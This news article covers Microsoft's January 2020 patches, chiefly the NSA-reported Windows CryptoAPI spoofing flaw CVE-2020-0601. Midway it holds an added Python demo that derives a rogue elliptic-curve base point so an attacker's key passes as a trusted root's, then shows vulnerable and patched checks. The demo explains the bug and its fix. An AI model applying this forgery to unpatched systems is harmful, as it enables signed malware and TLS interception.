- NSA has helped Microsoft fix a highly critical Windows bug instead of keeping it for themselves.
- The problem is a Windows CryptoAPI spoofing vulnerability (CVE-2020-0601) that can be exploited in several ways, from signing malware so it looks legitimate to intercepting TLS connections.
- Microsoft has released the fixing patches today, so all Windows users are urged to apply them immediately.
The NSA (National Security Agency) has discovered a major flaw in Windows and reported it to Microsoft. This had been rumored for the last couple of days, so we were expecting something significant to be patched in today's Windows update. What we didn't expect was for the reporting party to be the NSA, an agency that has in the past preferred to keep significant flaws for its own intelligence and spying operations. The disclosure may signal a shift in how the NSA handles vulnerabilities it finds, although it could also be a one-off.
This is a critical issue. Everyone should patch Win10/Win 2016 ASAP. Do not wait!
Also big kudos to NSA for voluntarily disclosing to Microsoft. This is the type of vuln I am sure the offensive side would have loved to use for years to come https://t.co/XOQmAdbSxC
— Dmitri Alperovitch (@DAlperovitch) January 14, 2020
The flaw has been assigned CVE-2020-0601 and lies in the way the Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. Because the validation does not check all of a certificate's curve parameters, an attacker can craft a certificate that Windows accepts as chaining to a trusted root CA, then use it to sign a malicious executable so that it appears to come from a legitimate publisher, or to impersonate HTTPS sites and decrypt TLS traffic. From there, anything follows: rerouted web traffic, stolen files, microphone activation, keystroke recording, disk wiping, ransomware installation, or whatever else an attacker wants to run under a trusted signature. Microsoft lists Windows 10 and Windows Server 2016/2019 as affected. This is why Microsoft pushed the fix for this bug to branches of the U.S. military before the rest of us got it with today's update. Once the update is installed, Crypt32.dll also logs exploitation attempts: look for Event ID 1 from source Microsoft-Windows-Audit-CVE in the Application event log.
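To make "CryptoAPI spoofing" concrete, here is an added example that is not part of the original article and not Microsoft's or the NSA's code: it reproduces the elliptic-curve arithmetic behind CVE-2020-0601 in pure Python on NIST P-256. An ECC certificate may carry its curve parameters explicitly rather than by name; the unpatched CryptoAPI matched such a certificate to a cached trusted root by public key alone, so an attacker who knows only the root's public key Q can pick a private key d' and publish G' = d'^-1 * Q as the base point, giving d' * G' == Q. The "root CA" private key, the attacker's key and the ECDSA nonce are constructed constants, and `vulnerable_match`/`patched_match` are simplified stand-ins for CryptoAPI's chain-matching logic, not its real code.

```python
# Added example (not from the article, nor Microsoft/NSA code): the arithmetic
# behind the CVE-2020-0601 CryptoAPI spoofing bug, in pure Python on NIST P-256.
import hashlib

# NIST P-256 domain parameters (public constants).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
INF = None  # point at infinity

def inv(x, m):
    """Modular inverse via Fermat's little theorem; P and N are both prime."""
    return pow(x, m - 2, m)

def ec_add(p1, p2):
    """Affine point addition/doubling on y^2 = x^3 + A*x + B over F_P."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def ec_mul(k, pt):
    """Double-and-add scalar multiplication k*pt."""
    acc = INF
    k %= N
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc

def ecdsa_sign(d, gen, msg, k):
    """Textbook ECDSA with an explicit base point `gen`. The nonce k is supplied
    by the caller only for reproducibility; real signers use a fresh random k."""
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    r = ec_mul(k, gen)[0] % N
    s = inv(k, N) * (z + r * d) % N
    return (r, s)

def ecdsa_verify(pub, gen, msg, sig):
    """ECDSA verification using whatever base point `gen` the verifier is handed."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    w = inv(s, N)
    pt = ec_add(ec_mul(z * w % N, gen), ec_mul(r * w % N, pub))
    return pt is not INF and pt[0] % N == r

# Constructed "trusted root CA" key pair for the demo. The attacker never needs
# ROOT_D; the real attack uses only the public key Q from a public root cert.
ROOT_D = 0x2b1c9e3f7a5d4e6c8b0a1f2e3d4c5b6a79887766554433221100ffeeddccbbaa
ROOT_Q = ec_mul(ROOT_D, G)

def forge_rogue_key(root_pub, attacker_d):
    """Return (rogue_gen, rogue_pub) such that rogue_pub == root_pub and
    rogue_pub == attacker_d * rogue_gen: attacker_d now signs for the root's key."""
    rogue_gen = ec_mul(inv(attacker_d, N), root_pub)
    return rogue_gen, ec_mul(attacker_d, rogue_gen)

def vulnerable_match(cert_pub, cert_gen, root_pub, root_gen):
    """Pre-patch behaviour (simplified): the public key alone decides the match."""
    return cert_pub == root_pub

def patched_match(cert_pub, cert_gen, root_pub, root_gen):
    """Post-patch behaviour (simplified): key *and* curve parameters must match."""
    return cert_pub == root_pub and cert_gen == root_gen

def demo(attacker_d=0xC0FFEE1337, nonce=0xDEADBEEF):
    rogue_gen, rogue_pub = forge_rogue_key(ROOT_Q, attacker_d)
    tbs = b"constructed stand-in for the to-be-signed bytes of a forged certificate"
    sig = ecdsa_sign(attacker_d, rogue_gen, tbs, nonce)
    return {
        # the forged key is coordinate-for-coordinate the root's public key
        "pub_matches_root": rogue_pub == ROOT_Q,
        # a verifier that trusts the cert's own explicit parameters accepts it
        "sig_ok_with_explicit_params": ecdsa_verify(rogue_pub, rogue_gen, tbs, sig),
        # the same signature is worthless under the root's real parameters
        "sig_ok_with_real_params": ecdsa_verify(ROOT_Q, G, tbs, sig),
        "vulnerable_accepts": vulnerable_match(rogue_pub, rogue_gen, ROOT_Q, G),
        "patched_accepts": patched_match(rogue_pub, rogue_gen, ROOT_Q, G),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the last two dictionary entries is the whole bug: the forged certificate only "chains" because the matching step ignored the base point, and the forged signature only verifies because the verifier took the base point from the attacker's certificate. Checking the full set of curve parameters against the trusted root, as the patched code does, is what closes the hole.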
Other critical vulnerabilities that have been addressed in this patch are the following:
- CVE-2020-0603, CVE-2020-0605, CVE-2020-0606 and CVE-2020-0646 – Four remote code execution flaws in the .NET Framework and ASP.NET Core.
- CVE-2020-0609 and CVE-2020-0610 – Remote code execution vulnerabilities in Windows Remote Desktop Gateway (RD Gateway), exploitable by an unauthenticated attacker who sends specially crafted requests to the gateway.
- CVE-2020-0611 – Remote code execution flaw in the Windows Remote Desktop client, triggered when a user connects to a malicious RDP server.
- CVE-2020-0640 – Memory corruption vulnerability in the Internet Explorer web browser.
Apart from the above, today's patch also fixes another 41 vulnerabilities classified as "important", so applying the update should be an absolute priority for all Windows users right now. Note also that this is the final public patch for Windows 7 and Windows Server 2008/2008 R2, which reach end of support today; from now on, only organizations paying for Extended Security Updates will keep receiving fixes for those systems.
As for what industry experts have to say about NSA’s decision to share their discovery with Microsoft, here’s what Chris Morales of Vectra told us: “NSA may have reported this flaw to MS because there was a concern that others would find this vulnerability themselves, and it was dangerous enough to warrant remediation instead of weaponizing. Or it just could be the NSA already has enough other methods for compromising a Windows system and doesn’t need it.”
Rick Holland, the Vice President of Digital Shadows, thinks that: “It would be a mistake to think that NSA is changing direction. They will continue to hoard zero-days and leverage them as required to accomplish their objectives.”